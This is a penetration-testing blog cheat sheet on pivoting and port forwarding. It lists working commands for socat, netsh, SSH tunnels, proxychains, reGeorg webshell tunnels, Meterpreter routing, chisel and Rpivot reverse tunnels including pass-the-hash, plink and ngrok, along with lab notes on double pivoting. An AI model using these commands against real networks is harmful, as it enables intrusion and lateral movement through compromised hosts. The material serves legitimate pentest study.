Pivoting & Port forwarding methods – part2
This blog will focus on port forwarding concepts. Here are some methods we will follow in this blog : –
- socat
- windows Netsh
- SSH
- proxychains
- Web Socks
- Metasploit
- sshuttle
- chisel
- Rpivot
- Plink
- Ngrok
SOCAT
To install socat, we simply run:
sudo apt-get updatesudo apt-get install socat
To run socat and forward traffic from your internet node IP 112.72.6.1 port 808 to remote node 62.41.90.2 port 443 run the following command:
socat TCP4-LISTEN:808,fork TCP4:62.41.90.2:443
To forward traffic from your internet node from port 9090 to remote node 62.41.90.2 port 22 and forward traffic from port 81 to port 21 on ftp.microsft.com run the following command:
socat TCP4-LISTEN:9090,fork TCP4:62.41.90.2:22|socat TCP4-LISTEN:81,fork T CP4:ftp.microsft.com:21
Windows Netsh Port Forwarding
netsh interface portproxy add v4tov4 listenaddress=localaddress listenport=localport connectaddress=destaddress connectport=destport netsh interface portproxy add v4tov4 listenport=3340 listenaddress=10.1.1.110 connectport=3389 connectaddress=10.1.1.110
- listenaddress – is a local IP address waiting for a connection.
- listenport – local listening TCP port (the connection waits on it).
- connectaddress – is a local or remote IP address (or DNS name) to which the incoming connection will be redirected.
- connectport – is a TCP port to which the connection from listenport is forwarded to.
SSH
SOCKS Proxy
ssh -D8080 [user]@[host] ssh -N -f -D 9000 [user]@[host] -f : ssh in background -N : do not execute a remote command
Cool Tip: Konami SSH Port forwarding
[ENTER] + [~C] -D 1090
Local Port Forwarding
ssh -L [bindaddr]:[port]:[dsthost]:[dstport] [user]@[host]
Remote Port Forwarding
ssh -R [bindaddr]:[port]:[localhost]:[localport] [user]@[host] ssh -R 3389:10.1.1.224:3389 [email protected]
proxychains
Config file: /etc/proxychains.conf
[ProxyList] socks4 localhost 8080
Set the SOCKS4 proxy then proxychains nmap -sT 192.168.5.6
Web SOCKS – reGeorg
reGeorg, the successor to reDuh, pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn.
Drop one of the following files on the server:
- tunnel.ashx
- tunnel.aspx
- tunnel.js
- tunnel.jsp
- tunnel.nosocket.php
- tunnel.php
- tunnel.tomcat.5.jsp
python reGeorgSocksProxy.py -p 8080 -u http://compromised.host/shell.jsp # the socks proxy will be on port 8080 optional arguments: -h, --help show this help message and exit -l , --listen-on The default listening address -p , --listen-port The default listening port -r , --read-buff Local read buffer, max data to be sent per POST -u , --url The url containing the tunnel script -v , --verbose Verbose output[INFO|DEBUG]
Metasploit
# Meterpreter list active port forwards portfwd list # Forwards 3389 (RDP) to 3389 on the compromised machine running the Meterpreter shell portfwd add –l 3389 –p 3389 –r target-host portfwd add -l 88 -p 88 -r 127.0.0.1 portfwd add -L 0.0.0.0 -l 445 -r 192.168.57.102 -p 445 # Forwards 3389 (RDP) to 3389 on the compromised machine running the Meterpreter shell portfwd delete –l 3389 –p 3389 –r target-host # Meterpreter delete all port forwards portfwd flush or # Use Meterpreters autoroute script to add the route for specified subnet 192.168.15.0 run autoroute -s 192.168.15.0/24 use auxiliary/server/socks4a # Meterpreter list all active routes run autoroute -p route #Meterpreter view available networks the compromised host can access # Meterpreter add route for 192.168.14.0/24 via Session number. route add 192.168.14.0 255.255.255.0 3 # Meterpreter delete route for 192.168.14.0/24 via Session number. route delete 192.168.14.0 255.255.255.0 3 # Meterpreter delete all routes route flush
sshuttle
The transparent proxy server that works as a poor man’s VPN. Forwards over ssh.
- Doesn’t require admin.
- Works with Linux and macOS.
- Supports DNS tunnelling.
pacman -Sy sshuttle apt-get install sshuttle sshuttle -vvr [email protected] 10.1.1.0/24 sshuttle -vvr [email protected]_host 10.2.2.0/24
chisel
go get -v github.com/jpillora/chisel # forward port 389 and 88 to hacker computer [email protected]$ .\chisel.exe client YOUR_IP:8008 R:88:127.0.0.1:88 R:389:localhost:389 [email protected]$ /opt/chisel/chisel server -p 8008 --reverse
Rpivot
Server (Attacker box)
python server.py --proxy-port 1080 --server-port 9443 --server-ip 0.0.0.0
Client (Compromised box)
python client.py --server-ip <ip> --server-port 9443
Through corporate proxy
python client.py --server-ip [server ip] --server-port 9443 --ntlm-proxy-ip [proxy ip] \ --ntlm-proxy-port 8080 --domain CORP --username jdoe --password 1q2w3e
Passing the hash
python client.py --server-ip [server ip] --server-port 9443 --ntlm-proxy-ip [proxy ip] \ --ntlm-proxy-port 8080 --domain CORP --username jdoe \ --hashes 986D46921DDE3E58E03656362614DEFE:50C189A98FF73B39AAD3B435B51404EE
plink
# exposes the SMB port of the machine in the port 445 of the SSH Server plink -l root -pw toor -R 445:127.0.0.1:445 # exposes the RDP port of the machine in the port 3390 of the SSH Server plink -l root -pw toor ssh-server-ip -R 3390:127.0.0.1:3389 plink -l root -pw mypassword 192.168.18.84 -R plink.exe -v -pw mypassword [email protected] -L 6666:127.0.0.1:445 plink -R [Port to forward to on your VPS]:localhost:[Port to forward on your local machine] [VPS IP] # redirects the Windows port 445 to Kali on port 22 plink -P 22 -l root -pw some_password -C -R 445:127.0.0.1:445 192.168.12.185
ngrok
# get the binary wget https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-amd64.zip unzip ngrok-stable-linux-amd64.zip # log into the service ./ngrok authtoken 3U[REDACTED_TOKEN]Hm # deploy a port forwarding for 4433 ./ngrok http 4433 ./ngrok tcp 4433
| Sensitive Content|
For my time in the labs, I started out using single-hop local SSH forwards through a pivot point that I had owned in the remote network. This works just fine if you know that port 80 is open and all you want to do is connect to port 80 inside a network you don’t have direct access to. That looks something like:
ssh [email protected] -L 81:10.71.1.28:80
Later on, I learned to do more dynamic SSH forwards with proxychains:
PROXYCHAINS
I used a dynamic ssh tunnel via John:
ssh -f -N -D 127.0.0.1:9050 [email protected] -p 22000
Tested with :
proxychains nmap 10.2.2.15 -sT -Pn
ssh -f -N -D 127.0.0.1:9050 [email protected]
leafpad /etc/proxychains.conf
proxychains ssh -f -N -D 127.0.0.1:9055 [email protected] -p 222
leafpad /etc/proxychains.conf
proxychains ssh [email protected]
And even later, I did double pivoting using proxychains:
ssh -tt -L8080:localhost:8157 [email protected] ssh -t -D 8157 [email protected] -p 222
set up proxychains to use our forwarded port 8080:
leafpad /etc/proxychains.conf
strict_chain or dynamic_chain
socks4 127.0.0.1 8080
Basic Pivoting Types
Type | Use Case |
---|---|
Listen – Listen | Exposed asset, may not want to connect out. |
Listen – Connect | Normal redirect. |
Connect – Connect | Can’t bind, so connect to bridge two hosts |
Listen – Listen
Type | Use Case |
---|---|
ncat | ncat -v -l -p 8080 -c "ncat -v -l -p 9090" |
socat | socat -v tcp-listen:8080 tcp-listen:9090 |
remote host 1 | ncat localhost 8080 < file |
remote host 2 | ncat localhost 9090 > newfile |
Listen – Connect
Type | Use Case |
---|---|
ncat | ncat -l -v -p 8080 -c "ncat localhost 9090" |
socat | socat -v tcp-listen:8080,reuseaddr tcp-connect:localhost:9090 |
remote host 1 | ncat localhost -p 8080 < file |
remote host 2 | ncat -l -p 9090 > newfile |
Connect – Connect
Type | Use Case |
---|---|
ncat | ncat localhost 8080 -c "ncat localhost 9090" |
socat | socat -v tcp-connect:localhost:8080,reuseaddr tcp-connect:localhost:9090 |
remote host 1 | ncat -l -p 8080 < file |
remote host 2 | ncat -l -p 9090 > newfile |
1 Response
[…] https://blog.certcube.com/pivoting-port-forwarding/ This is a really good video on port forwarding, if you can understand this then you can skip the one below https://www.youtube.com/watch?v=ngbSsMAYYsE […]